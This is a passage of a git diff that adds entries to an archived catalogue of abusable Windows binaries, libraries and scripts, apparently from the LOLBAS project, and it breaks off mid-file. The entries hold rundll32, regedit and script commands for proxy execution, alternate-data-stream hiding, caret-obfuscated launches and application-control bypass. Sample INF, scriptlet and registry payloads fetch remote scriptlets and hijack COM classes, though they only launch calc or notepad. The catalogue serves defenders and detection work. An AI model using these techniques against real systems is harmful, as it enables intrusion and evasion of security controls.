|   * https://twitter.com/subTee/status/789459826367606784 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\odbcconf.exe     | ||||
|   * c:\windows\sysWOW64\odbcconf.exe | ||||
|     | ||||
| * Notes: Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer | ||||
| See the Playloads folder for an example .RSP file. | ||||
|    | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSBinaries/reg.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSBinaries/reg.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## reg.exe | ||||
| * Functions: Export Reg, Add ADS, Import Reg | ||||
| ``` | ||||
|  | ||||
| reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg | ||||
| Export the target Registry key and save it to the specified .REG file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\reg.exe | ||||
|   * c:\windows\sysWOW64\reg.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										20
									
								
								Archive-Old-Version/OSBinaries/regedit.exe.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								Archive-Old-Version/OSBinaries/regedit.exe.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| ## regedit.exe | ||||
| * Functions: Write ADS, Read ADS, Import registry | ||||
| ``` | ||||
|  | ||||
| regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey | ||||
| Export the target Registry key to the specified .REG file. | ||||
|  | ||||
| regedit C:\ads\file.txt:regfile.reg" | ||||
| Import the target .REG file into the Registry. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\regedit.exe | ||||
|   * C:\Windows\SysWOW64\regedit.exe | ||||
|     | ||||
| * Notes: Thanks to Oddvar Moe - @oddvarmoe   | ||||
|     | ||||
							
								
								
									
										32
									
								
								Archive-Old-Version/OSLibraries/Advpack.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										32
									
								
								Archive-Old-Version/OSLibraries/Advpack.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,32 @@ | ||||
| ## Advpack.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). | ||||
|  | ||||
| rundll32.exe advpack.dll,LaunchINFSection test.inf,,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). | ||||
|  | ||||
| rundll32.exe Advpack.dll,RegisterOCX calc.exe | ||||
| Launch executable by calling the RegisterOCX function. | ||||
|  | ||||
| rundll32 advpack.dll, RegisterOCX "cmd.exe /c calc.exe" | ||||
| Launch executable by calling the RegisterOCX function. | ||||
|  | ||||
| rundll32.exe Advpack.dll,RegisterOCX test.dll | ||||
| Launch a DLL payload by calling the RegisterOCX function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/ | ||||
|   * https://twitter.com/ItsReallyNick/status/967859147977850880 | ||||
|   * https://twitter.com/bohops/status/974497123101179904 | ||||
|   * https://twitter.com/moriarty_meng/status/977848311603380224 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\advpack.dll | ||||
|   * c:\windows\sysWOW64\advpack.dll | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL), Moriarty @moriarty_meng (RegisterOCX - Cmd)   | ||||
|     | ||||
							
								
								
									
										28
									
								
								Archive-Old-Version/OSLibraries/Ieadvpack.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										28
									
								
								Archive-Old-Version/OSLibraries/Ieadvpack.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,28 @@ | ||||
| ## Ieadvpack.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,LaunchINFSection c:\\test.inf,DefaultInstall_SingleUser,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (Section name specified). | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,LaunchINFSection test.inf,,1, | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive (DefaultInstall section implied). | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,RegisterOCX calc.exe | ||||
| Launch executable by calling the RegisterOCX function. | ||||
|  | ||||
| rundll32.exe IEAdvpack.dll,RegisterOCX test.dll | ||||
| Launch a DLL payload by calling the RegisterOCX function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/991695411902599168 | ||||
|   * https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
|   * https://twitter.com/0rbz_/status/974472392012689408 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\ieadvpack.dll | ||||
|   * c:\windows\sysWOW64\ieadvpack.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (RegisterOCX - Cmd), Jimmy - @bohops (LaunchINFSection), fabrizio - @0rbz_ (RegisterOCX - DLL)   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSLibraries/Ieframe.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSLibraries/Ieframe.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Ieframe.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" | ||||
| Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. | ||||
|  | ||||
| rundll32.exe ieframe.dll,OpenURL c:\\test\\calc-url-file.zz | ||||
| Renamed URL file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ | ||||
|   * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ | ||||
|   * https://twitter.com/bohops/status/997690405092290561 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Ieframe.dll | ||||
|   * c:\windows\sysWOW64\Ieframe.dll | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops   | ||||
|     | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSLibraries/Mshtml.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSLibraries/Mshtml.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Mshtml.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" | ||||
| Invoke an HTML Application. Note - Pops a security warning and a print dialogue box. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/998567549670477824 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Mshtml.dll | ||||
|   * c:\windows\sysWOW64\Mshtml.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken   | ||||
|     | ||||
							
								
								
									
										14
									
								
								Archive-Old-Version/OSLibraries/Payload/Advpack.inf
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										14
									
								
								Archive-Old-Version/OSLibraries/Payload/Advpack.inf
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,14 @@ | ||||
| [version] | ||||
| Signature=$chicago$ | ||||
| AdvancedINF=2.5 | ||||
|  | ||||
| [DefaultInstall_SingleUser] | ||||
| UnRegisterOCXs=UnRegisterOCXSection | ||||
|  | ||||
| [UnRegisterOCXSection] | ||||
| %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct | ||||
|  | ||||
| [Strings] | ||||
| AppAct = "SOFTWARE\Microsoft\Connection Manager" | ||||
| ServiceName="Yay" | ||||
| ShortSvcName="Yay" | ||||
							
								
								
									
										44
									
								
								Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										44
									
								
								Archive-Old-Version/OSLibraries/Payload/Advpack_calc.sct
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,44 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
| 	> | ||||
|  | ||||
| 	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| 	<!-- DFIR --> | ||||
| 	<!--		.sct files are downloaded and executed from a path like this --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|  | ||||
|  | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee -->  | ||||
|         <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
|  | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
|  | ||||
| 		]]> | ||||
| 	</script> | ||||
| </registration> | ||||
|  | ||||
| <public> | ||||
|     <method name="Exec"></method> | ||||
| </public> | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	function Exec() | ||||
| 	{ | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); | ||||
| 	} | ||||
|  | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
							
								
								
									
										14
									
								
								Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										14
									
								
								Archive-Old-Version/OSLibraries/Payload/Ieadvpack.inf
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,14 @@ | ||||
| [version] | ||||
| Signature=$chicago$ | ||||
| AdvancedINF=2.5 | ||||
|  | ||||
| [DefaultInstall_SingleUser] | ||||
| UnRegisterOCXs=UnRegisterOCXSection | ||||
|  | ||||
| [UnRegisterOCXSection] | ||||
| %11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSLibraries/Payload/Advpack_calc.sct | ||||
|  | ||||
| [Strings] | ||||
| AppAct = "SOFTWARE\Microsoft\Connection Manager" | ||||
| ServiceName="Yay" | ||||
| ShortSvcName="Yay" | ||||
							
								
								
									
										44
									
								
								Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										44
									
								
								Archive-Old-Version/OSLibraries/Payload/Ieadvpack_calc.sct
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,44 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
| 	> | ||||
|  | ||||
| 	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll | ||||
| 	<!-- DFIR --> | ||||
| 	<!--		.sct files are downloaded and executed from a path like this --> | ||||
| 	<!-- Though, the name and extension are arbitary.. --> | ||||
| 	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | ||||
| 	<!-- Based on current research, no registry keys are written, since call "uninstall" --> | ||||
|  | ||||
|  | ||||
| 	<!-- Proof Of Concept - Casey Smith @subTee -->  | ||||
|         <!-- @RedCanary - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/atomic-dev-cs/Windows/Payloads/mshta.sct --> | ||||
| 	<script language="JScript"> | ||||
| 		<![CDATA[ | ||||
|  | ||||
| 			var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
|  | ||||
| 		]]> | ||||
| 	</script> | ||||
| </registration> | ||||
|  | ||||
| <public> | ||||
|     <method name="Exec"></method> | ||||
| </public> | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	function Exec() | ||||
| 	{ | ||||
| 		var r = new ActiveXObject("WScript.Shell").Run("notepad.exe"); | ||||
| 	} | ||||
|  | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
							
								
								
									
										17
									
								
								Archive-Old-Version/OSLibraries/Pcwutl.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										17
									
								
								Archive-Old-Version/OSLibraries/Pcwutl.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,17 @@ | ||||
| ## Pcwutl.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe pcwutl.dll,LaunchApplication calc.exe | ||||
| Launch executable by calling the LaunchApplication function. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/harr0ey/status/989617817849876488 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Pcwutl.dll | ||||
|   * c:\windows\sysWOW64\Pcwutl.dll | ||||
|     | ||||
| * Notes: Thanks to Matt harr0ey - @harr0ey   | ||||
|     | ||||
							
								
								
									
										23
									
								
								Archive-Old-Version/OSLibraries/Setupapi.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										23
									
								
								Archive-Old-Version/OSLibraries/Setupapi.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,23 @@ | ||||
| ## Setupapi.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32 setupapi,InstallHinfSection DefaultInstall 132 c:\temp\calc.inf | ||||
| Launch an executable file via the InstallHinfSection function and .inf file section directive. | ||||
|  | ||||
| rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\shady.inf | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/994742106852941825 | ||||
|   * https://twitter.com/subTee/status/951115319040356352 | ||||
|   * https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   * https://github.com/huntresslabs/evading-autoruns | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Setupapi.dll | ||||
|   * c:\windows\sysWOW64\Setupapi.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Executable), Kyle Hanslovan - @KyleHanslovan (COM Scriptlet), Huntress Labs - @HuntressLabs (COM Scriptlet), Casey Smith - @subTee (COM Scriptlet)   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSLibraries/Shdocvw.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSLibraries/Shdocvw.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Shdocvw.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" | ||||
| Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. | ||||
|  | ||||
| rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.zz" | ||||
| Renamed URL file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ | ||||
|   * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ | ||||
|   * https://twitter.com/bohops/status/997690405092290561 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Shdocvw.dll | ||||
|   * c:\windows\sysWOW64\Shdocvw.dll | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn, Jimmy - @bohops   | ||||
|     | ||||
							
								
								
									
										26
									
								
								Archive-Old-Version/OSLibraries/Shell32.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										26
									
								
								Archive-Old-Version/OSLibraries/Shell32.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,26 @@ | ||||
| ## Shell32.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe shell32.dll,Control_RunDLL payload.dll | ||||
| Launch DLL payload. | ||||
|  | ||||
| rundll32.exe shell32.dll,ShellExec_RunDLL beacon.exe | ||||
| Launch executable payload. | ||||
|  | ||||
| rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" | ||||
| Launch executable payload with arguments. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/Hexacorn/status/885258886428725250 | ||||
|   * https://twitter.com/pabraeken/status/991768766898941953 | ||||
|   * https://twitter.com/mattifestation/status/776574940128485376 | ||||
|   * https://twitter.com/KyleHanslovan/status/905189665120149506 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\shell32.dll | ||||
|   * c:\windows\sysWOW64\shell32.dll | ||||
|     | ||||
| * Notes: Thanks to Adam - @hexacorn (Control_RunDLL), Pierre-Alexandre Braeken - @pabraeken (ShellExec_RunDLL), Matt Graeber - @mattifestation (ShellExec_RunDLL), Kyle Hanslovan - @KyleHanslovan (ShellExec_RunDLL)   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSLibraries/Syssetup.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSLibraries/Syssetup.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| ## Syssetup.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\calc.INF | ||||
| Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive. | ||||
|  | ||||
| rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\\test\\shady.inf | ||||
| Remote fetch and execute a COM Scriptlet by calling an information file directive. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/994392481927258113 | ||||
|   * https://twitter.com/harr0ey/status/975350238184697857 | ||||
|   * https://twitter.com/bohops/status/975549525938135040 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\Syssetup.dll | ||||
|   * c:\windows\sysWOW64\Syssetup.dll | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Execute), Matt harr0ey - @harr0ey (Execute), Jimmy - @bohops (COM Scriptlet)   | ||||
|     | ||||
							
								
								
									
										36
									
								
								Archive-Old-Version/OSLibraries/Url.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										36
									
								
								Archive-Old-Version/OSLibraries/Url.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,36 @@ | ||||
| ## Url.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe url.dll,OpenURL "C:\\test\\calc.hta" | ||||
| Launch a HTML application payload by calling OpenURL. | ||||
|  | ||||
| rundll32.exe url.dll,OpenURL "C:\\test\\calc.url" | ||||
| Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. | ||||
|  | ||||
| rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | ||||
| Launch an executable payload by calling OpenURL. | ||||
|  | ||||
| rundll32.exe url.dll,FileProtocolHandler calc.exe | ||||
| Launch an executable payload by calling FileProtocolHandler. | ||||
|  | ||||
| rundll32.exe url.dll,FileProtocolHandler file:///C:/test/test.hta | ||||
| Launch a HTML application payload by calling FileProtocolHandler. | ||||
|  | ||||
| rundll32 url.dll,FileProtocolHandler file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | ||||
| Launch an executable payload by calling FileProtocolHandler. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ | ||||
|   * https://twitter.com/bohops/status/974043815655956481 | ||||
|   * https://twitter.com/DissectMalware/status/995348436353470465 | ||||
|   * https://twitter.com/yeyint_mth/status/997355558070927360 | ||||
|   * https://twitter.com/Hexacorn/status/974063407321223168 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\url.dll | ||||
|   * c:\windows\sysWOW64\url.dll | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops (OpenURL), Adam - @hexacorn (OpenURL), Malwrologist - @DissectMalware (FileProtocolHandler - HTA), r0lan - @yeyint_mth (Obfuscation)   | ||||
|     | ||||
							
								
								
									
										21
									
								
								Archive-Old-Version/OSLibraries/Zipfldr.dll.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										21
									
								
								Archive-Old-Version/OSLibraries/Zipfldr.dll.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,21 @@ | ||||
| ## Zipfldr.dll | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| rundll32.exe zipfldr.dll,RouteTheCall calc.exe | ||||
| Launch an executable payload by calling RouteTheCall. | ||||
|  | ||||
| rundll32.exe zipfldr.dll,RouteTheCall file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e | ||||
| Launch an executable payload by calling RouteTheCall. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/moriarty_meng/status/977848311603380224 | ||||
|   * https://twitter.com/bohops/status/997896811904929792 | ||||
|     | ||||
| * Full path:    | ||||
|   * c:\windows\system32\zipfldr.dll | ||||
|   * c:\windows\sysWOW64\zipfldr.dll | ||||
|     | ||||
| * Notes: Thanks to Moriarty - @moriarty_meng (Execute), r0lan - @yeyint_mth (Obfuscation)   | ||||
|     | ||||
							
								
								
									
										20
									
								
								Archive-Old-Version/OSScripts/CL_Invocation.ps1.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								Archive-Old-Version/OSScripts/CL_Invocation.ps1.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| ## CL_Invocation.ps1 | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| . C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1   \nSyncInvoke <executable> [args] | ||||
| Import the PowerShell Diagnostic CL_Invocation script and call SyncInvoke to launch an executable. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ | ||||
|   * https://twitter.com/bohops/status/948548812561436672 | ||||
|   * https://twitter.com/pabraeken/status/995107879345704961 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1 | ||||
|   * C:\Windows\diagnostics\system\Audio\CL_Invocation.ps1 | ||||
|   * C:\Windows\diagnostics\system\WindowsUpdate\CL_Invocation.ps1 | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bohops (Execute), Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate Paths)   | ||||
|     | ||||
							
								
								
									
										19
									
								
								Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										19
									
								
								Archive-Old-Version/OSScripts/CL_Mutexverifiers.ps1.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,19 @@ | ||||
| ## CL_Mutexverifiers.ps1 | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| . C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1    | ||||
| runAfterCancelProcess calc.ps1 | ||||
| Import the PowerShell Diagnostic CL_Mutexverifiers script and call runAfterCancelProcess to launch an executable. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://twitter.com/pabraeken/status/995111125447577600 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 | ||||
|   * C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1 | ||||
|   * C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1 | ||||
|     | ||||
| * Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken (Audio + WindowsUpdate)   | ||||
|     | ||||
							
								
								
									
										20
									
								
								Archive-Old-Version/OSScripts/Manage-bde.wsf.md
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										20
									
								
								Archive-Old-Version/OSScripts/Manage-bde.wsf.md
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,20 @@ | ||||
| ## Manage-bde.wsf | ||||
| * Functions: Execute | ||||
| ``` | ||||
|  | ||||
| set comspec=c:\windows\system32\calc.exe & cscript c:\windows\system32\manage-bde.wsf | ||||
| Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. | ||||
|  | ||||
| copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf | ||||
| Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. | ||||
| ``` | ||||
|     | ||||
| * Resources:    | ||||
|   * https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 | ||||
|   * https://twitter.com/bohops/status/980659399495741441 | ||||
|     | ||||
| * Full path:    | ||||
|   * C:\Windows\System32\manage-bde.wsf | ||||
|     | ||||
| * Notes: Thanks to Jimmy - @bophops (Comspec), Daniel Bohannon - @danielhbohannon (Path Hijack)   | ||||
|     | ||||
							
								
								
									
										22
									
								
								Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										22
									
								
								Archive-Old-Version/OSScripts/Payload/Pubprn_calc.sct
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,22 @@ | ||||
| <?XML version="1.0"?> | ||||
| <scriptlet> | ||||
|  | ||||
| <registration | ||||
|     description="Bandit" | ||||
|     progid="Bandit" | ||||
|     version="1.00" | ||||
|     classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | ||||
|     remotable="true" | ||||
| 	> | ||||
| </registration> | ||||
|  | ||||
| <script language="JScript"> | ||||
| <![CDATA[ | ||||
|  | ||||
| 	var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | ||||
| 	 | ||||
| 	 | ||||
| ]]> | ||||
| </script> | ||||
|  | ||||
| </scriptlet> | ||||
							
								
								
									
										24
									
								
								Archive-Old-Version/OSScripts/Payload/Slmgr.reg
									
									
									
									
									
										Normal file
									
								
							
							
						
						
									
										24
									
								
								Archive-Old-Version/OSScripts/Payload/Slmgr.reg
									
									
									
									
									
										Normal file
									
								
							| @@ -0,0 +1,24 @@ | ||||
| Windows Registry Editor Version 5.00 | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | ||||
| @="" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID] | ||||
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | ||||
|  | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] | ||||
| @="Scripting.Dictionary" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32] | ||||
| @="C:\\WINDOWS\\system32\\scrobj.dll" | ||||
| "ThreadingModel"="Apartment" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID] | ||||
| @="Scripting.Dictionary" | ||||
|  | ||||
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL] | ||||
